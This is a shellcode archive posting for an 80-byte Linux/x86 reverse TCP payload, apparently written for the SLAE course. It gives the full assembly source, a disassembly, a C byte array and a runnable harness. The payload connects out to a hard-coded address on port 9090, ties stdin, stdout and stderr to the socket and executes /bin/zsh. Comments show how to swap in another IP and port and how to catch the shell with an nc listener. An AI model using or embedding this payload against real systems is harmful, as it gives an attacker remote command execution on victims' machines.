
Linux/x86 zsh Reverse TCP Shellcode Port 9090

Linux/x86 zsh Reverse TCP Shellcode Port 9090
Posted Aug 12, 2016
Authored by thryb

80-byte, NULL-free Linux/x86 reverse TCP shellcode: it connects back to a hard-coded IPv4 address on port 9090, wires stdin/stdout/stderr to the socket with dup2(), and then execve()s /bin/zsh.

tags | x86, tcp, shellcode
systems | linux
SHA-256 | 56debc233c9a721c245394bbd645bf53ea7df9f8ba5c7e7090e4322b6b6cc8c3

Linux/x86 zsh Reverse TCP Shellcode Port 9090

/* 

;
; Linux x86
; Author: thryb
; Date: 21-07-16
; Purpose: Reverse /bin/zsh to TCP port 9090
; Size: 80 bytes
; ID: SLAE-770
; Git: https://www.github.com/thryb/SLAE-770
;


global _start

section .text

; Linux/x86 (32-bit) reverse TCP shell, NASM syntax, legacy int 0x80 ABI:
; eax = syscall number, arguments in ebx, ecx, edx, result in eax
; (negative = -errno).  socket() and connect() go through socketcall(2)
; (eax = 102): ebx = sub-call number, ecx = pointer to the argument array.
;
; Register roles:
;   esi  socket descriptor between socket() and connect()
;   ebx  socketcall sub-call number; later read as the dup2() oldfd (see NOTE)
;   ecx  pointer to the current argument array; later the dup2() newfd counter
;   edx  never written -- see the execve() note at the bottom
;
; Every instruction is chosen so the encoding contains no 0x00 byte
; (byte-sized immediates, xor-zeroing, xchg instead of mov); keep that
; property when editing, and keep the byte count at 80 so the C array and
; the objdump listing below stay in sync.

_start:

xor eax, eax ; eax = 0; also the NULL that gets pushed below
xor ebx, ebx ; ebx = 0 so that "mov bl" yields a clean 32-bit sub-call number

; 1 - create socket
; socket(AF_INET, SOCK_STREAM, 0);
; #define SYS_SOCKET 1 // sys_socket(2)
push eax ; protocol = 0
push byte 0x1 ; type = SOCK_STREAM
push byte 0x2 ; domain = AF_INET; esp now points at {2, 1, 0}
mov al, 0x66 ; eax = socketcall (102)
mov bl, 0x1 ; ebx = SYS_SOCKET (1)
mov ecx, esp ; ecx = &args
int 0x80 ; eax = sockfd on success, -errno on failure (never checked)

; esi = sockfd.  eax takes the OLD esi, and the next "mov al" writes only the
; low byte, so this silently assumes esi was 0 beforehand: true at a fresh
; ELF entry point, not guaranteed when this code is jumped to from a C
; harness or another payload.
xchg esi, eax ; esi = sockfd

; 2 - Connect
; connect(sockfd, (struct sockaddr *)&srv_addr, sizeof(srv_addr));

mov al, 0x66 ; eax = socketcall (102), relying on the upper bytes being 0
add ebx, 0x2 ; ebx = 1 + 2 = SYS_CONNECT (3)
; sin_addr: pushed as 0xefffff7f, which lands in memory as 7f ff ff ef, i.e.
; 127.255.255.239 (not .254 as the original note claimed).  The value is
; the little-endian form of the dotted quad; any octet equal to 0 would put
; a NULL byte in the shellcode, which is why a loopback-range test address
; with no zero octets is used here.  ip2shell.py emits this form.
push 0xefffff7f ; sin_addr = 127.255.255.239
push word 0x8223 ; sin_port: bytes 23 82 = htons(9090) (port2shell.py)
push word 0x2 ; sin_family = AF_INET; esp = &srv_addr (8 bytes built)
mov ecx, esp ; ecx = &srv_addr
; addrlen is 16, but only 8 bytes of the struct were built; the remaining
; 8 (sin_zero) are whatever sits above on the stack.  Harmless here because
; connect() does not inspect sin_zero for AF_INET.
push 0x10 ; addrlen = 16
push ecx ; &srv_addr
push esi ; sockfd
mov ecx, esp ; ecx = &{sockfd, &srv_addr, 16}
int 0x80 ; connect(); eax = 0 on success, -errno otherwise (never checked)

xchg eax, esi ; eax = sockfd, esi = connect() result; neither is used again

; 3 - dup
; sys_dup2 = 63 = 0x3f
; dup2(oldfd = ebx, newfd = ecx) for ecx = 2, 1, 0.
; NOTE(review): oldfd comes from ebx, which still holds 3 from the
; SYS_CONNECT sub-call number -- NOT from the real sockfd (that value in eax
; is overwritten by "mov al, 0x3f" on the first iteration).  This only works
; because the socket is the first descriptor opened after stdio, i.e. fd 3.
; If the host process already has other files open, stdio gets tied to the
; wrong descriptor and the shell is unreachable.

xor ecx, ecx ; ecx = 0
add cl, 0x2 ; ecx = 2 (STDERR_FILENO), counting down to 0

dup2: ; STDIN, STDOUT, STDERR
mov al, 0x3f ; eax = dup2 (63); assumes the previous result left eax's upper bytes 0
int 0x80 ; dup2(ebx, ecx); eax = ecx on success
dec cl ; next lower descriptor; sets SF when cl wraps from 0 to 0xff
jns dup2 ; loop while cl >= 0: three calls, for newfd 2, 1, 0

; 4 - execve /bin/zsh
; normal execve shell exec
; execve("/bin/zsh", ["/bin/zsh", NULL], envp)
; eax is 0 here only because the last dup2(ebx, 0) returned 0; that 0 is
; what terminates both the path string and argv below.
; edx (envp) is never written anywhere in this listing, so execve() gets
; whatever edx held at entry -- presumably 0 for a freshly started static
; ELF, but not something a C harness or a staged loader guarantees; confirm
; before embedding this in another payload.

push eax ; NUL terminator for the path string
push 0x68737a2f ; "/zsh" (bytes 2f 7a 73 68)
push 0x6e69622f ; "/bin" -> the stack now reads "/bin/zsh\0"
mov ebx, esp ; ebx = filename
push eax ; argv[1] = NULL
push ebx ; argv[0] = filename
mov ecx, esp ; ecx = argv
mov al, 0xb ; eax = execve (11)
int 0x80 ; replaces the process with zsh; on failure execution falls off the end of the code


============================================================================================================

No NULL bytes in the assembled code -- objdump -d of the linked binary (note the byte-sized immediates and register-only forms throughout):

./reverse-zsh-tcp-9090.bin: file format elf32-i386


Disassembly of section .text:

08048060 <_start>:
8048060: 31 c0 xor %eax,%eax
8048062: 31 db xor %ebx,%ebx
8048064: 50 push %eax
8048065: 6a 01 push $0x1
8048067: 6a 02 push $0x2
8048069: b0 66 mov $0x66,%al
804806b: b3 01 mov $0x1,%bl
804806d: 89 e1 mov %esp,%ecx
804806f: cd 80 int $0x80
8048071: 96 xchg %eax,%esi
8048072: b0 66 mov $0x66,%al
8048074: 83 c3 02 add $0x2,%ebx
8048077: 68 7f ff ff ef push $0xefffff7f
804807c: 66 68 23 82 pushw $0x8223
8048080: 66 6a 02 pushw $0x2
8048083: 89 e1 mov %esp,%ecx
8048085: 6a 10 push $0x10
8048087: 51 push %ecx
8048088: 56 push %esi
8048089: 89 e1 mov %esp,%ecx
804808b: cd 80 int $0x80
804808d: 96 xchg %eax,%esi
804808e: 31 c9 xor %ecx,%ecx
8048090: 80 c1 02 add $0x2,%cl

08048093 <dup2>:
8048093: b0 3f mov $0x3f,%al
8048095: cd 80 int $0x80
8048097: fe c9 dec %cl
8048099: 79 f8 jns 8048093 <dup2>
804809b: 50 push %eax
804809c: 68 2f 7a 73 68 push $0x68737a2f
80480a1: 68 2f 62 69 6e push $0x6e69622f
80480a6: 89 e3 mov %esp,%ebx
80480a8: 50 push %eax
80480a9: 53 push %ebx
80480aa: 89 e1 mov %esp,%ecx
80480ac: b0 0b mov $0xb,%al
80480ae: cd 80 int $0x80


*/

#include<stdio.h>
#include<string.h>

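/*
 * The 80 shellcode bytes from the listing above, stored as a C string so
 * the compiler appends a trailing NUL (sizeof(code) == 81, strlen == 80).
 * None of the 80 bytes is 0x00, so strlen() reports the full length; if
 * you patch the IP or port and the printed length drops below 80, the new
 * value introduced a NUL and any string-based loader will truncate the
 * payload.
 *
 * Layout (byte offsets into code[]):
 *   0..23   socket() setup and the start of the connect() block
 *   24..27  sin_addr: the target IPv4 address, one octet per byte
 *   28..29  pushw opcode (66 68) -- leave alone
 *   30..31  sin_port: port in network byte order (0x2382 = 9090)
 *   32..79  rest of connect(), the dup2() loop and execve("/bin/zsh")
 *
 * The original listing was missing the terminating ';' after the last
 * string fragment, which made the file fail to compile.
 */
unsigned char code[] = \
"\x31\xc0\x31\xdb\x50\x6a\x01\x6a\x02\xb0\x66\xb3\x01\x89\xe1\xcd\x80\x96\xb0\x66\x83\xc3\x02\x68"

// Replace IP here (use ip2shell.py to generate it). Default 7f ff ff ef =
// 127.255.255.239. Any octet of 0 (10.0.0.1, 192.168.0.5, ...) puts a NUL
// byte here and breaks the "no NULL" property.
"\x7f\xff\xff\xef"
// *****************

"\x66\x68"

// Replace port here (use port2shell.py to generate the port, big-endian).
// Ports whose high or low byte is 0 (80 = 00 50, 256 = 01 00, ...) contain
// a NUL and break the "no NULL" property.
"\x23\x82"
// *****************

"\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x96\x31\xc9\x80\xc1\x02\xb0\x3f\xcd\x80\xfe\xc9\x79\xf8\x50\x68\x2f\x7a\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";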
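/*
 * Test harness: print the shellcode length, then jump into code[].
 *
 * code[] lives in a writable data segment, so this only works when that
 * segment is executable (typically gcc -m32 -fno-stack-protector
 * -z execstack ...).  On a successful run the process is replaced by
 * /bin/zsh talking to the hard-coded IP:port, so run it only in a lab
 * with a listener (e.g. nc -lvp 9090) already waiting.
 *
 * Returns 0 only if the shellcode hands control back, which the payload
 * above is not designed to do.
 */
int main(void)
{
    /* strlen() stops at the first NUL: anything below 80 means a NUL
     * crept in while editing the IP or port bytes. */
    printf("Shellcode Length: %d\n", (int)strlen((const char *)code));
    /* A successful execve() discards unflushed stdio buffers. */
    fflush(stdout);

    /* Converting an object pointer to a function pointer is
     * implementation-defined in C, but it is what every gcc/x86
     * shellcode harness relies on. */
    void (*entry)(void) = (void (*)(void))(void *)code;
    entry();

    return 0;
}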
